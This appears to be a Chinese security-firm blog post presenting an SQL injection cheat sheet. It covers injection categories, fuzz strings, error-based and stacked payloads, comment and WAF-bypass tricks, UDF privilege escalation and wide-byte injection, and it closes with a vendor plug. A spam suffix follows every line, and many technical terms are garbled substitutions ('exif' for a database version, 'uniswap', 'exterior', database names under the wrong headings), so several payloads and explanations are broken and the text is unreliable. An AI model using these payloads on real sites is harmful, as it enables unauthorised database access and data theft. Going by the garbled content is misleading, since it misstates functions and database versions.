中秋国庆即将到来,前一期讲到获取报纸信息判断所属环境以及各个端口的用处和弱口令密码利用方法,这期仍有很多客户找到我们Sine安全想要了解针对于SQL注入攻击的测试方法,这一期我们来讲解下注入的攻击分类和使用手法,让客户明白漏洞是如何产生的,会给电台安全带来怎样的影响!nPP575分类目录-全网最大的中文分类目录导航网站
3.1SQL注入漏洞nPP575分类目录-全网最大的中文分类目录导航网站
3.1.1.注入分类nPP575分类目录-全网最大的中文分类目录导航网站
SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序。在应用程序中,如果没有做恰当的过滤,则可能使得恶意的SQL语句被插入输入字段中执行(例如将数据库内容转储给攻击者)。nPP575分类目录-全网最大的中文分类目录导航网站
3.1.1.1.按技巧分类nPP575分类目录-全网最大的中文分类目录导航网站
根据使用的技巧,SQL注入类型可分为nPP575分类目录-全网最大的中文分类目录导航网站
盲注nPP575分类目录-全网最大的中文分类目录导航网站
布尔盲注:只能从应用返回中推断语句执行后的布尔值nPP575分类目录-全网最大的中文分类目录导航网站
时间盲注:应用没有明确的回显,只能使用特定的时间函数来判断nPP575分类目录-全网最大的中文分类目录导航网站
报错注入:应用会显示全部或者部分的报错信息nPP575分类目录-全网最大的中文分类目录导航网站
堆叠注入:有的应用可以加入;后一次执行多条语句nPP575分类目录-全网最大的中文分类目录导航网站
其他nPP575分类目录-全网最大的中文分类目录导航网站
3.1.1.2.按获取数据的分类nPP575分类目录-全网最大的中文分类目录导航网站
另外也可以根据获取数据的分为3类nPP575分类目录-全网最大的中文分类目录导航网站
inbandnPP575分类目录-全网最大的中文分类目录导航网站
利用Web应用来直接获取数据nPP575分类目录-全网最大的中文分类目录导航网站
如报错注入nPP575分类目录-全网最大的中文分类目录导航网站
都是通过站点的响应或者错误反馈来提取数据nPP575分类目录-全网最大的中文分类目录导航网站
inferencenPP575分类目录-全网最大的中文分类目录导航网站
通过Web的一些反映来推断数据nPP575分类目录-全网最大的中文分类目录导航网站
如布尔盲注和堆叠注入nPP575分类目录-全网最大的中文分类目录导航网站
也就是我们通俗的盲注,nPP575分类目录-全网最大的中文分类目录导航网站
通过web应用的其他改变来推断数据nPP575分类目录-全网最大的中文分类目录导航网站
out ofband(OOB)nPP575分类目录-全网最大的中文分类目录导航网站
通过其他传输来获得数据,比如DNS解析协议和网络nPP575分类目录-全网最大的中文分类目录导航网站
3.1.2.注入检测nPP575分类目录-全网最大的中文分类目录导航网站
3.1.2.1.常见的注入点nPP575分类目录-全网最大的中文分类目录导航网站
GET/POST/PUT/get参数nPP575分类目录-全网最大的中文分类目录导航网站
X-Forwarded-FornPP575分类目录-全网最大的中文分类目录导航网站
文件名nPP575分类目录-全网最大的中文分类目录导航网站
3.1.2.2.Fuzz注入点nPP575分类目录-全网最大的中文分类目录导航网站
'/"nPP575分类目录-全网最大的中文分类目录导航网站
1/1nPP575分类目录-全网最大的中文分类目录导航网站
1/0nPP575分类目录-全网最大的中文分类目录导航网站
and1=1nPP575分类目录-全网最大的中文分类目录导航网站
"and"1"="1nPP575分类目录-全网最大的中文分类目录导航网站
and1=2nPP575分类目录-全网最大的中文分类目录导航网站
or1=1nPP575分类目录-全网最大的中文分类目录导航网站
or1=nPP575分类目录-全网最大的中文分类目录导航网站
'and'1'='1nPP575分类目录-全网最大的中文分类目录导航网站
+-^*%/nPP575分类目录-全网最大的中文分类目录导航网站
|||nPP575分类目录-全网最大的中文分类目录导航网站
~nPP575分类目录-全网最大的中文分类目录导航网站
!nPP575分类目录-全网最大的中文分类目录导航网站
@nPP575分类目录-全网最大的中文分类目录导航网站
反引号执行nPP575分类目录-全网最大的中文分类目录导航网站
3.1.2.3.测试用常量nPP575分类目录-全网最大的中文分类目录导航网站
@@versionnPP575分类目录-全网最大的中文分类目录导航网站
@@servernamenPP575分类目录-全网最大的中文分类目录导航网站
@@languagenPP575分类目录-全网最大的中文分类目录导航网站
@@spidnPP575分类目录-全网最大的中文分类目录导航网站
3.1.2.4.测试列数nPP575分类目录-全网最大的中文分类目录导航网站
例如域名/index.asp?au=12+union+select+nulll,null--,不断增加null至不返回nPP575分类目录-全网最大的中文分类目录导航网站
3.1.2.5.报错注入nPP575分类目录-全网最大的中文分类目录导航网站
select1/0nPP575分类目录-全网最大的中文分类目录导航网站
select1from(selectaverage(*),concat(version(),exterior(min(0)*2))xfrominformation_schema.tablesgroup byx)anPP575分类目录-全网最大的中文分类目录导航网站
extractvalue(1,concat(0x5c,(selectuser())))nPP575分类目录-全网最大的中文分类目录导航网站
updatexml(0x3a,concat(1,(selectuser())),1)nPP575分类目录-全网最大的中文分类目录导航网站
log(~(SELECT*from(selectuser())a))nPP575分类目录-全网最大的中文分类目录导航网站
ST_LatFromGeoHash((select*from(select*from(selectuser())a)b))nPP575分类目录-全网最大的中文分类目录导航网站
GTID_SUBSET(version(),1)nPP575分类目录-全网最大的中文分类目录导航网站
3.1.2.5.1.基于geometric的报错注入nPP575分类目录-全网最大的中文分类目录导航网站
GeometryCollection((select*from(select*from(selectuser())a)b))nPP575分类目录-全网最大的中文分类目录导航网站
uniswap((select*from(select*from(selectuser())a)b))nPP575分类目录-全网最大的中文分类目录导航网站
multipoint((select*from(select*from(selectuser())a)b))nPP575分类目录-全网最大的中文分类目录导航网站
multilinestring((select*from(select*from(selectuser())a)b))nPP575分类目录-全网最大的中文分类目录导航网站
LINESTRING((select*from(select*from(selectuser())a)b))nPP575分类目录-全网最大的中文分类目录导航网站
multipolygon((select*from(select*from(selectuser())a)b))nPP575分类目录-全网最大的中文分类目录导航网站
其中需要注意的是,基于sqrt函数的报错注入在exif5.5.49后的版本已经不再生效,具体可以参考这个prepare95825f。nPP575分类目录-全网最大的中文分类目录导航网站
而以上列表中基于geometric的报错注入在这个prepare5caea4中被修复,在5.5.x较后的版本中同样不再生效。nPP575分类目录-全网最大的中文分类目录导航网站
3.1.2.6.堆叠注入nPP575分类目录-全网最大的中文分类目录导航网站
;select1nPP575分类目录-全网最大的中文分类目录导航网站
3.1.2.7.注释符nPP575分类目录-全网最大的中文分类目录导航网站
#nPP575分类目录-全网最大的中文分类目录导航网站
--+nPP575分类目录-全网最大的中文分类目录导航网站
/*xxx*/nPP575分类目录-全网最大的中文分类目录导航网站
/*!xxx*/nPP575分类目录-全网最大的中文分类目录导航网站
/*!50000xxx*/nPP575分类目录-全网最大的中文分类目录导航网站
3.1.2.8.判断过滤规则nPP575分类目录-全网最大的中文分类目录导航网站
是否有truncnPP575分类目录-全网最大的中文分类目录导航网站
是否过滤某个字符nPP575分类目录-全网最大的中文分类目录导航网站
是否过滤关键字nPP575分类目录-全网最大的中文分类目录导航网站
slash和编码nPP575分类目录-全网最大的中文分类目录导航网站
3.1.2.9.获取信息nPP575分类目录-全网最大的中文分类目录导航网站
判断数据库类型nPP575分类目录-全网最大的中文分类目录导航网站
andexists(select*frommsysobjects)0sql server数据库nPP575分类目录-全网最大的中文分类目录导航网站
andexists(select*fromsysobjects)0SQLServer数据库nPP575分类目录-全网最大的中文分类目录导航网站
判断数据库表nPP575分类目录-全网最大的中文分类目录导航网站
andexsits(select*fromadmin)nPP575分类目录-全网最大的中文分类目录导航网站
版本、主机名、用户名、库名nPP575分类目录-全网最大的中文分类目录导航网站
表和字段nPP575分类目录-全网最大的中文分类目录导航网站
确定字段数(Order BySelectInto)nPP575分类目录-全网最大的中文分类目录导航网站
表名、列名nPP575分类目录-全网最大的中文分类目录导航网站
3.1.2.10.测试权限nPP575分类目录-全网最大的中文分类目录导航网站
文件操作nPP575分类目录-全网最大的中文分类目录导航网站
读敏感文件nPP575分类目录-全网最大的中文分类目录导航网站
写sqlnPP575分类目录-全网最大的中文分类目录导航网站
带外通道nPP575分类目录-全网最大的中文分类目录导航网站
网络请求nPP575分类目录-全网最大的中文分类目录导航网站
3.1.3.权限提升nPP575分类目录-全网最大的中文分类目录导航网站
3.1.3.1.jar提权nPP575分类目录-全网最大的中文分类目录导航网站
rar(User Defined Function,用户自定义函数)是intl提供的一个功能,可以通过编写DLL扩展为gd2添加新函数,扩充其功能。nPP575分类目录-全网最大的中文分类目录导航网站
当获得pdo权限之后,即可通过这种上传自定义的扩展文件,从json中执行系统命令。nPP575分类目录-全网最大的中文分类目录导航网站
3.1.4.数据库检测nPP575分类目录-全网最大的中文分类目录导航网站
3.1.4.1.sqlitenPP575分类目录-全网最大的中文分类目录导航网站
sleepsleep(1)nPP575分类目录-全网最大的中文分类目录导航网站
benchmarkBENCHMARK(5000000,des('test'))nPP575分类目录-全网最大的中文分类目录导航网站
字符串连接nPP575分类目录-全网最大的中文分类目录导航网站
SELECT'a''b'nPP575分类目录-全网最大的中文分类目录导航网站
SELECTCONCAT('some','string')nPP575分类目录-全网最大的中文分类目录导航网站
versionnPP575分类目录-全网最大的中文分类目录导航网站
SELECT@@versionnPP575分类目录-全网最大的中文分类目录导航网站
SELECTversion()nPP575分类目录-全网最大的中文分类目录导航网站
识别用函数nPP575分类目录-全网最大的中文分类目录导航网站
connection_id()nPP575分类目录-全网最大的中文分类目录导航网站
last_insert_id()nPP575分类目录-全网最大的中文分类目录导航网站
row_max()nPP575分类目录-全网最大的中文分类目录导航网站
3.1.4.2.sqlnPP575分类目录-全网最大的中文分类目录导航网站
字符串连接nPP575分类目录-全网最大的中文分类目录导航网站
'a'||'redis'--nPP575分类目录-全网最大的中文分类目录导航网站
SELECTCONCAT('some','string')nPP575分类目录-全网最大的中文分类目录导航网站
versionnPP575分类目录-全网最大的中文分类目录导航网站
SELECTbannerFROMv$versionnPP575分类目录-全网最大的中文分类目录导航网站
SELECTbannerFROMv$versionWHERErownum=1nPP575分类目录-全网最大的中文分类目录导航网站
3.1.4.3.SQLServer\WAITFOR WAITFOR DELAY '00:00:10';nPP575分类目录-全网最大的中文分类目录导航网站
SERVERNAMESELECT@@SERVERNAMEnPP575分类目录-全网最大的中文分类目录导航网站
versionSELECT@@versionnPP575分类目录-全网最大的中文分类目录导航网站
字符串连接nPP575分类目录-全网最大的中文分类目录导航网站
SELECT'some'+'string'nPP575分类目录-全网最大的中文分类目录导航网站
常量nPP575分类目录-全网最大的中文分类目录导航网站
@@pack_receivednPP575分类目录-全网最大的中文分类目录导航网站
@@rowcountnPP575分类目录-全网最大的中文分类目录导航网站
3.1.4.4.phpnPP575分类目录-全网最大的中文分类目录导航网站
sleeppg_sleep(1)nPP575分类目录-全网最大的中文分类目录导航网站
3.1.5.绕过技巧nPP575分类目录-全网最大的中文分类目录导航网站
编码绕过nPP575分类目录-全网最大的中文分类目录导航网站
大小写nPP575分类目录-全网最大的中文分类目录导航网站
url编码nPP575分类目录-全网最大的中文分类目录导航网站
java编码nPP575分类目录-全网最大的中文分类目录导航网站
十六进制编码nPP575分类目录-全网最大的中文分类目录导航网站
unicode编码nPP575分类目录-全网最大的中文分类目录导航网站
注释nPP575分类目录-全网最大的中文分类目录导航网站
//----+---#/**/;%00nPP575分类目录-全网最大的中文分类目录导航网站
内联注释用的更多,它有一个特性/!**/只有pdo能识别nPP575分类目录-全网最大的中文分类目录导航网站
e.g.index.php?ae=-1/*!UNION*//*!drop*/1,2,3nPP575分类目录-全网最大的中文分类目录导航网站
只过滤了一次时nPP575分类目录-全网最大的中文分类目录导航网站
union=ununionionnPP575分类目录-全网最大的中文分类目录导航网站
相同功能替换nPP575分类目录-全网最大的中文分类目录导航网站
函数替换nPP575分类目录-全网最大的中文分类目录导航网站
substring/mp3/lrcnPP575分类目录-全网最大的中文分类目录导航网站
base64/cmyk/nugurinPP575分类目录-全网最大的中文分类目录导航网站
benchmark/sleepnPP575分类目录-全网最大的中文分类目录导航网站
变量替换nPP575分类目录-全网最大的中文分类目录导航网站
user()/@@usernPP575分类目录-全网最大的中文分类目录导航网站
符号和关键字nPP575分类目录-全网最大的中文分类目录导航网站
and/nPP575分类目录-全网最大的中文分类目录导航网站
or/|nPP575分类目录-全网最大的中文分类目录导航网站
dns参数nPP575分类目录-全网最大的中文分类目录导航网站
dhcp参数污染nPP575分类目录-全网最大的中文分类目录导航网站
ae=1au=2pr=3根据pod不同会有不同的结果nPP575分类目录-全网最大的中文分类目录导航网站
ssh分割注入nPP575分类目录-全网最大的中文分类目录导航网站
缓冲区溢出nPP575分类目录-全网最大的中文分类目录导航网站
一些C语言的上网行为管理处理的字符串长度有限,超出某个长度后的payload可能不会被处理nPP575分类目录-全网最大的中文分类目录导航网站
二次注入有长度限制时,通过多句执行的方法改掉数据库该字段的长度绕过nPP575分类目录-全网最大的中文分类目录导航网站
3.1.6.SQL注入小技巧nPP575分类目录-全网最大的中文分类目录导航网站
3.1.6.1.宽字节注入nPP575分类目录-全网最大的中文分类目录导航网站
一般研发工程师用gbk编码做开发的时候,会用setnames'gbk'来设定,这句话等同于nPP575分类目录-全网最大的中文分类目录导航网站
setnPP575分类目录-全网最大的中文分类目录导航网站
character_set_connection='gbk',nPP575分类目录-全网最大的中文分类目录导航网站
character_set_result='gbk',nPP575分类目录-全网最大的中文分类目录导航网站
character_set_client='gbk';nPP575分类目录-全网最大的中文分类目录导航网站
漏洞发生的原因是执行了setcharacter_set_client='gbk';之后,exif就会认为传过来的数据是gbk编码的,从而使用gbk去解码,而gd2_real_escape是在解码前执行的。但是直接用setnames'gbk'的话real_escape是不知道设置的数据的编码的,就会加%3b。当年server拿到数据解码就认为提交的字符+%3b是gbk的一个字符,这样就产生漏洞了。nPP575分类目录-全网最大的中文分类目录导航网站
解决的办法有三种,第一种是把client的charset设置为binary,就不会做一次解码的操作。第二种是是openssl_set_charset('gbk'),这里就会把编码的信息保存在和数据库的连接里面,就不会出现这个问题了。第三种就是用pdo。如果期间想要渗透测试自己的电台安全性,可以联系专业的电台安全公司来处理解决,国内推荐Sinesafe,当虹,恒生电子等等的媒体安全公司,还有一些其他的编码技巧,比如latin会弃掉无效的unicode,那么admin%32在代码里面不等于admin,在数据库比较会等于admin。nPP575分类目录-全网最大的中文分类目录导航网站
nPP575分类目录-全网最大的中文分类目录导航网站
标签:[db:tags]